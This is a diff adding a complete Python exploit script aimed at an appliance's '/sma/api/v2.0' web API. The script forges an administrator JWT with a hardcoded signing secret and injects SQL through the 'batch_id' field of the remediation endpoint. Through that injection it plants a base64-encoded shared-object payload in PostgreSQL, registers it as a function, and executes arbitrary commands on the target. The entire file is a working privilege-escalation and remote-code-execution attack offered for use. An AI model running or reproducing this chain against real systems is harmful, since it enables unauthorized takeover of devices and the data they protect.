| | 1 | + | #!/usr/bin/env python3 |
| | 2 | + | import jwt |
| | 3 | + | import json |
| | 4 | + | import time |
| | 5 | + | import random |
| | 6 | + | import string |
| | 7 | + | import base64 |
| | 8 | + | import urllib3 |
| | 9 | + | import datetime |
| | 10 | + | import requests |
| | 11 | + | import argparse |
| | 12 | + | |
| | 13 | + | DEVICE_TYPE = 'sma' |
| | 14 | + | JWT_SECRET = 'VmxaU1MyTXlWbk5oTTJ4UVZsVmFUMVpyVm5OT2JFNXlVbFJzVVZWVU1Eaz0=' |
| | 15 | + | PG_SYSTEM = [ |
| | 16 | + | 'f0VMRgIBAQkAAAAAAAAAAAMAPgABAAAAgAUAAAAAAABAAAAAAAAAAKAVAAAAAAAAAAAAAEAAOAAGAEAAIQAgAAEAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAzAgAAAAAAADMCAAAAAAAAAAAIAAAAAAAAQAAAAYAAADQCAAAAAAAANAIIAAAAAAA0AggAAAAAAAAAgAAAAAAABACAAAAAAAAAAAgAAAAAAACAAAABgAAAPAIAAAAAAAA8AggAAAAAADwCCAAAAAAAIABAAAAAAAAgAEAAAAAAAAIAAAAAAAAAAQAAAAEAAAAtAgAAAAAAAC0CAAAAAAAALQIAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAQAAAAAAAAAUOV0ZAQAAADABwAAAAAAAMAHAAAAAAAAwAcAAAAAAAA0AAAAAAAAADQAAAAAAAAABAAAAAAAAABR5XRkBgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAMAAAAOAAAADAAAAAsAAAANAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAADAAAAAgAAAAQAAAAHAAAABQAAAAgAAAAJAAAABgAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaQAAABIACwCfBgAAAAAAAJkAAAAAAAAAUgAAABIACwCFBgAAAAAAAA0AAAAAAAAADQAAACAAAAAAAAAAAAAAAAAAAAAAAAAAbAAAABIAAAAAAAAAAAAAAAAAAAAAAAAAAQAAABIADACEBwAAAAAAAAAAAAAAAAAAiwAAABIAAAAAAAAAAAAAAAAAAAAAAAAAcwAAABAAAAAAAAAAAAAAAAAAAAAAAAAAhAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAABIACwCSBgAAAAAAAA0AAAAAAAAAQwAAACIAAAAAAAAAAAAAAAAAAAAAAAAAKQAAACAAAAAAAAAAAAAAAAAAAAAAAAAABwAAABIACADwBAAAAAAAAAAAAAAAAAAAkgAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAF9maW5pAF9pbml0AF9JVE1fZGVyZWdpc3RlclRNQ2xvbmVUYWJsZQBfSVRNX3JlZ2lzdGVyVE1DbG9uZVRhYmxlAF9fY3hhX2ZpbmFsaXplAFBnX21hZ2ljX2Z1bmMAcGdfZmluZm9fcGdfc3lzdGVtAHBnX2RldG9hc3RfZGF0dW0AcGFsbG9jAG1lbWNweQBwZnJlZQBsaWJjLnNvLjcARkJTRF8xLjAAAAAAAQABAAEAAgABAAIAAQABAAEAAgABAAEAAQABAAEAmAAAABAAAAAAAAAAsCh6BwAAAgCiAAAAAAAAAMgKIAAAAAAACAAAAAAAAADICiAAAAAAAHAKIAAAAAAABgAAAAMAAAAAAAAAAAAAAHgKIAAAAAAABgAAAAoAAAAAAAAAAAAAAIAKIAAAAAAABgAAAAsAAAAAAAAAAAAAAKAKIAAAAAAABwAAAAQAAAAAAAAAAAAAAKgKIAAAAAAABwAAAAYAAAAAAAAAAAAAALAKIAAAAAAABwAAAAcAAAAAAAAAAAAAALgKIAAAAAAABwAAAAgAAAAAAAAAAAAAAMAKIAAAAAAABwAAAA0AAAAAAAAAAAAAAEiD7AjohwEAAOhCAgAASIPECMMAAAAAAAAAAAAAAAAA/zV6BSAA/yV8BSAADx9AAP8legUgAGgAAAAA6eD/////JXIFIABoAQAAAOnQ/////yVqBSAAaAIAAADpwP////8lYgUgAGgDAAAA6bD/////JVoFIABoBAAAAOmg/////yUCBSAAZpAAAAAAAAAAAEiNPUkFIABIjQVCBSAASDn4dBVIiwXWBCAASIXAdAn/4A8fgAAAAADDDx+AAAAAAEiNPRkFIABIjTUSBSAASCn+SInwSMHuP0jB+ANIAcZI0f50FEiLBaUEIABIhcB0CP/gZg8fRAAAww8fgAAAAACAPdkEIAAAdXdVSIM9dgQgAABIieVBVFN0DEiLPbcEIADoWv///0iNBcMCIABIjR3EAiAASCnDSYnESIsFpwQgAEjB+wNIg+sBSDnYcx1mkEiDwAFIiQWNBCAAQf8UxEiLBYIEIABIOdhy5egg////W0FcxgVmBCAAAV3DDx9AAMNmZi4PH4QAAAAAAA8fQADpK////1VIieVIjQUQAQAAXcNVSInlSI0FHwEAAF3DVUiJ5UiD7DBIiX3YSItF2EiLQCBIicfohf7//0iJRfhIi0X4iwDB6AKD6ASJRfSLRfSDwAFImEiJx+hy/v//SIlF6MdF5AAAAACLRfRIY9BIi0X4SI1IBEiLRehIic5IicfoKv7//4tF9Ehj0EiLRehIAdDGAABIi0XoSInH6P79//+JReRIi0XoSInH6C/+//+LReRImMnDDx+EAAAAAABIiwWJASAASIP4/3QzVUiJ5VNIjR13ASAASIPsCA8fAP/QSItD+EiD6whIg/j/dfBIi134ycNmLg8fhAAAAAAAww8fAEiD7AjoY/7//0iDxAjDAAAAAAAAAAAAAAAAAAAcAAAATAQAAGQAAAAgAAAAQAAAAAEAAAABAAAAAQAAAAEbAzs0AAAABQAAAFD9//9QAAAAsP3//3gAAADF/v//kAAAANL+//+wAAAA3/7//9AAAAAAAAAAFAAAAAAAAAA=', |
| | 17 | + | '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', |
| | 18 | + | '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', |
| | 19 | + | 'YAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAABnAAAAAQAAAAYAAAAAAAAAcAUAAAAAAABwBQAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAAcAAAAAEAAAAGAAAAAAAAAIAFAAAAAAAAgAUAAAAAAAAEAgAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAHYAAAABAAAABgAAAAAAAACEBwAAAAAAAIQHAAAAAAAADgAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAB8AAAAAQAAAAIAAAAAAAAAoAcAAAAAAACgBwAAAAAAACAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAhAAAAAEAAAACAAAAAAAAAMAHAAAAAAAAwAcAAAAAAAA0AAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAJIAAAABAAAAAgAAAAAAAAD4BwAAAAAAAPgHAAAAAAAAvAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAACcAAAABwAAAAIAAAAAAAAAtAgAAAAAAAC0CAAAAAAAABgAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAApgAAAAEAAAADAAAAAAAAANAIIAAAAAAA0AgAAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAK0AAAABAAAAAwAAAAAAAADgCCAAAAAAAOAIAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAAC0AAAABgAAAAMAAAAAAAAA8AggAAAAAADwCAAAAAAAAIABAAAAAAAAAwAAAAAAAAAIAAAAAAAAABAAAAAAAAAAawAAAAEAAAADAAAAAAAAAHAKIAAAAAAAcAoAAAAAAAAYAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAIAAAAAAAAAL0AAAABAAAAAwAAAAAAAACICiAAAAAAAIgKAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAgAAAAAAAAACAAAAAAAAADGAAAAAQAAAAMAAAAAAAAAyAogAAAAAADICgAAAAAAAAgAAAAAAAAAAAAAAAAAAAAIAAAAAAAAAAAAAAAAAAAAzAAAAAgAAAADAAAAAAAAANAKIAAAAAAA0AoAAAAAAAAQAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAANEAAAABAAAAMAAAAAAAAAAAAAAAAAAAANAKAAAAAAAAMQAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAAADaAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABCwAAAAAAAIAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAA6QAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAgQsAAAAAAACyAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAPUAAAABAAAAAAAAAAAAAAAAAAAAAAAAADMNAAAAAAAAPgAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAADAQAAAQAAAAAAAAAAAAAAAAAAAAAAAABxDQAAAAAAABABAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAADwEAAAEAAAAAAAAAAAAAAAAAAAAAAAAAgQ4AAAAAAACgAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAAAAAAAAAAACgPAAAAAAAAeAMAAAAAAAAfAAAAGAAAAAgAAAAAAAAAGAAAAAAAAAAJAAAAAwAAAAAAAAAAAAAAAAAAAAAAAACgEgAAAAAAAN8BAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAfxQAAAAAAAAdAQAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAA==' |
| | 20 | + | ] |
| | 21 | + | |
| | 22 | + | |
| | 23 | + | class Exploit: |
| | 24 | + | def __init__(self, args): |
| | 25 | + | self.url = args.url |
| | 26 | + | self.username = args.username |
| | 27 | + | self.password = args.password |
| | 28 | + | self.command = args.command |
| | 29 | + | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) |
| | 30 | + | self.s = requests.Session() |
| | 31 | + | self.s.headers = { |
| | 32 | + | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36', |
| | 33 | + | 'Accept': 'application/json, text/plain, */*' |
| | 34 | + | } |
| | 35 | + | self.s.verify = False |
| | 36 | + | |
| | 37 | + | def trigger(self): |
| | 38 | + | print('[*] Logging in') |
| | 39 | + | if not self.login(): |
| | 40 | + | print('[-] Exploit failed') |
| | 41 | + | exit() |
| | 42 | + | print('[*] Elevating privileges') |
| | 43 | + | if not self.eop(): |
| | 44 | + | print('[-] Exploit failed') |
| | 45 | + | exit() |
| | 46 | + | print('[*] Triggering command execution') |
| | 47 | + | if not self.rce(): |
| | 48 | + | print('[-] Exploit failed') |
| | 49 | + | exit() |
| | 50 | + | print('[*] Cleaning up') |
| | 51 | + | if not self.cleanup(): |
| | 52 | + | print('[-] Exploit failed') |
| | 53 | + | exit() |
| | 54 | + | print('[#] Exploit succeeded') |
| | 55 | + | |
| | 56 | + | def login(self): |
| | 57 | + | data = { |
| | 58 | + | 'data': { |
| | 59 | + | 'userName': base64.b64encode(self.username.encode('latin-1')).decode('latin-1'), |
| | 60 | + | 'passphrase': base64.b64encode(self.password.encode('latin-1')).decode('latin-1') |
| | 61 | + | } |
| | 62 | + | } |
| | 63 | + | r = self.s.post(self.url + '/' + DEVICE_TYPE + |
| | 64 | + | '/api/v2.0/login', data=json.dumps(data)) |
| | 65 | + | if r.status_code != 200: |
| | 66 | + | return False |
| | 67 | + | response = json.loads(r.content) |
| | 68 | + | self.jwt_token = response['data']['jwtToken'] |
| | 69 | + | return True |
| | 70 | + | |
| | 71 | + | def eop(self): |
| | 72 | + | def encode(s): |
| | 73 | + | s = base64.b64encode(str(s).encode('latin-1')).decode('latin-1') |
| | 74 | + | chunks = [s[i:i+76] for i in range(0, len(s), 76)] |
| | 75 | + | return '\n'.join(chunks) |
| | 76 | + | |
| | 77 | + | def decode(s): |
| | 78 | + | return base64.b64decode(s.replace('\n', '')).decode('latin-1') |
| | 79 | + | |
| | 80 | + | try: |
| | 81 | + | token = json.loads(base64.b64decode(self.jwt_token.split('.')[1])) |
| | 82 | + | except: |
| | 83 | + | try: |
| | 84 | + | token = json.loads(base64.b64decode( |
| | 85 | + | self.jwt_token.split('.')[1] + '=')) |
| | 86 | + | except: |
| | 87 | + | try: |
| | 88 | + | token = json.loads(base64.b64decode( |
| | 89 | + | self.jwt_token.split('.')[1] + '==')) |
| | 90 | + | except: |
| | 91 | + | return False |
| | 92 | + | cookie = decode(token['cookie']) |
| | 93 | + | |
| | 94 | + | server_host = decode(cookie.split('\n;')[0]) |
| | 95 | + | client_ip = decode(cookie.split('\n;')[1]) |
| | 96 | + | user_agent = decode(cookie.split('\n;')[2]) |
| | 97 | + | server_session_id = decode(cookie.split('\n;')[3]) |
| | 98 | + | system_description = decode(cookie.split('\n;')[4]) |
| | 99 | + | |
| | 100 | + | admin_cookie = encode('\n;'.join([ |
| | 101 | + | encode(server_host), |
| | 102 | + | encode(client_ip), |
| | 103 | + | encode(user_agent), |
| | 104 | + | encode(server_session_id), |
| | 105 | + | encode(system_description), |
| | 106 | + | encode('admin'), |
| | 107 | + | encode('application/json, text/plain, */*') |
| | 108 | + | ]) + '\n;') + '\n' |
| | 109 | + | |
| | 110 | + | admin_token = { |
| | 111 | + | 'userName': 'admin', |
| | 112 | + | 'is2FactorCheckRequired': False, |
| | 113 | + | 'cookie': admin_cookie, |
| | 114 | + | 'user': 'NONEUQ', |
| | 115 | + | 'sessionEndTime': int(datetime.datetime.utcnow().timestamp()) + 3600 * 48, |
| | 116 | + | 'exp': int(datetime.datetime.utcnow().timestamp()) + 3600 * 48 |
| | 117 | + | } |
| | 118 | + | |
| | 119 | + | admin_token = jwt.encode(admin_token, base64.b64decode(JWT_SECRET)) |
| | 120 | + | headers = { |
| | 121 | + | 'jwtToken': admin_token |
| | 122 | + | } |
| | 123 | + | r = self.s.get(self.url + '/' + DEVICE_TYPE + |
| | 124 | + | '/api/v2.0/login/privileges', headers=headers) |
| | 125 | + | self.jwt_token = admin_token |
| | 126 | + | return r.status_code == 200 |
| | 127 | + | |
| | 128 | + | def rce(self): |
| | 129 | + | def sqli(query): |
| | 130 | + | headers = { |
| | 131 | + | 'jwtToken': self.jwt_token |
| | 132 | + | } |
| | 133 | + | data = { |
| | 134 | + | 'data': { |
| | 135 | + | 'batch_id': ''.join(random.choice(string.ascii_letters) for _ in range(8)) + '\', 0, 0, 0, 0, 0, 0, 0, 0, 0); ' + query + ' ;-- ', |
| | 136 | + | 'action': 'delete', |
| | 137 | + | 'initiated_username': 'x', |
| | 138 | + | 'batch_name': 'x', |
| | 139 | + | 'message_details': [ |
| | 140 | + | { |
| | 141 | + | 'mid': [1], |
| | 142 | + | 'from_email': ['[email protected]'], |
| | 143 | + | 'ip': '192.168.1.1', |
| | 144 | + | 'subject': 'x', |
| | 145 | + | 'sent_at': 1, |
| | 146 | + | 'recipient_email': ['[email protected]'] |
| | 147 | + | } |
| | 148 | + | ] |
| | 149 | + | } |
| | 150 | + | } |
| | 151 | + | self.s.post(self.url + '/' + DEVICE_TYPE + '/api/v2.0/remediation', |
| | 152 | + | headers=headers, data=json.dumps(data)) |
| | 153 | + | time.sleep(0.5) |
| | 154 | + | |
| | 155 | + | loid = ''.join(random.choice(string.ascii_letters) for _ in range(8)) |
| | 156 | + | shell_path = '/tmp/' + \ |
| | 157 | + | ''.join(random.choice(string.ascii_letters) |
| | 158 | + | for _ in range(8)) + '.so' |
| | 159 | + | |
| | 160 | + | sqli('SELECT lo_create(0) INTO ' + loid) |
| | 161 | + | for i in range(len(PG_SYSTEM)): |
| | 162 | + | sqli('INSERT INTO pg_largeobject (loid, pageno, data) VALUES ((SELECT * FROM ' + |
| | 163 | + | loid + '), ' + str(i) + ', (DECODE(\'' + PG_SYSTEM[i] + '\', \'base64\')))') |
| | 164 | + | sqli('SELECT lo_export((SELECT * FROM ' + loid + '), \'' + shell_path + '\')') |
| | 165 | + | sqli('SELECT lo_unlink((SELECT * FROM ' + loid + '))') |
| | 166 | + | sqli('DROP TABLE ' + loid) |
| | 167 | + | time.sleep(5) |
| | 168 | + | sqli('CREATE OR REPLACE FUNCTION pg_system(TEXT) RETURNS INTEGER AS \'' + |
| | 169 | + | shell_path + '\',\'pg_system\' LANGUAGE C STRICT') |
| | 170 | + | sqli('SELECT pg_system(\'' + self.command + '\')') |
| | 171 | + | return True |
| | 172 | + | |
| | 173 | + | def cleanup(self): |
| | 174 | + | return True |
| | 175 | + | |
| | 176 | + | |
| | 177 | + | if __name__ == '__main__': |
| | 178 | + | parser = argparse.ArgumentParser() |
| | 179 | + | parser.add_argument('--url', help='Target URL', required=True) |
| | 180 | + | parser.add_argument( |
| | 181 | + | '--username', help='Username of low privilege user', required=True) |
| | 182 | + | parser.add_argument( |
| | 183 | + | '--password', help='Password of low privilege user', required=True) |
| | 184 | + | parser.add_argument('--command', help='Command to execute', required=True) |
| | 185 | + | exploit = Exploit(parser.parse_args()) |
| | 186 | + | exploit.trigger() |
Charlie Root
committed
1 year ago